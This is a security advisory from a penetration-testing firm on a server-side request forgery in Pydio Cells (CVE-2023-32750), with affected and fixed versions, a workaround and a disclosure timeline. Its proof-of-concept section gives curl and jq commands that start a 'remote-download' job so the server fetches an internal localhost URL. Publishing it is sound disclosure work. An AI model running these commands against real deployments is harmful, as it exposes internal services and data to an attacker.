Pydio Cells: Server-Side Request Forgery

Rufen Sie uns an!
+49 241 510081-0

Aktuelles

19.07.2023
Neues Advisory veröffentlicht: Session Token Enumeration in RWS WorldServer.
12.07.2023
Es wurde eine neue Version von monsoon veröffentlicht. Unser neuer Blog-Post beschreibt die neuen Funktionen und Verbesserungen im Detail.
05.06.2023
In unserem neuen Blog-Artikel erklären wir typische Fehler im Umgang mit Authentifizierungsmechanismen am Beispiel einer Schwachstelle in der Webschnittstelle von STARFACE PBX.
01.06.2023
Neues Advisory veröffentlicht: STARFACE: Authentication with Password Hash Possible.
30.05.2023
Drei neue Advisories für Schwachstellen in der Open-Source-Software Pydio Cells veröffentlicht: Unauthorised Role Assignments, Cross-Site Scripting via File Download, Server-Side Request Forgery.
09.05.2023
Heute haben wir das von uns entwickelte Programm resocks veröffentlicht. Im Blog-Artikel beschreiben wir die Funktionsweise und technische Details.
12.04.2023
Wir beschreiben in unserem neuen Blog-Post das Vorgehen bei der Integration unseres neuen Druckers, damit dieser unseren selbstauferlegten Sicherheitskriterien entspricht.
10.02.2023
Jens Liebchen hat am 7. Februar 2023 den Vortrag „Physical Security – Wenn Türen zu Firewalls werden” am Lehrstuhl für IT-Sicherheitsinfrastrukturen an der Friedrich-Alexander-Universität Erlangen-Nürnberg gehalten. Die Folien stehen unter Publikationen zum Download bereit.
26.01.2023
Neues Advisory veröffentlicht: Skyhigh Security Secure Web Gateway: Cross-Site Scripting in Single Sign-On Plugin.
18.01.2023
Alexander Neumann hat gestern im Rahmen der Veranstaltung „Studierende treffen Alumni und Unternehmensexperten” den Vortrag „Mitbringsel aus dem Alltag: Star Wars in der niedersächsischen Provinz” an der FH Aachen gehalten. Die Folien stehen unter Publikationen zum Download zur Verfügung.

> Advisories > rt-sa-2023-005 vertical divider

Zurück zur Übersicht

[rt-sa-2023-004]

Pydio Cells: Server-Side Request Forgery

For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job "remote-download" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells.


Details
=======

Product: Pydio Cells
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

Using the REST-API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder an HTTP request similar to the following is sent:

------------------------------------------------------------------------
PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140

{
  "JobName": "move",
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
}
------------------------------------------------------------------------ 

The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, also a job with the name "remote-download" exists. It takes two additional parameters: "urls" and
"target". In the "urls" parameter, a list of URLs can be specified and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs. The responses are saved into a file, which are uploaded to the specified folder within Pydio Cells. Potential errors are transmitted in a WebSocket channel, which can be opened through the "/ws/event" endpoint.


Proof of Concept
================

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"

$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
| tee remote-download.json

$ curl --header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--request PUT \
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'
------------------------------------------------------------------------ 

The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel. 


Workaround
==========

Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall.


Fix
===

Upgrade Pydio Cells to a version without the vulnerability. 


Security Risk
=============

The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, overall the vulnerability is rated as a medium risk.


Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. 

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/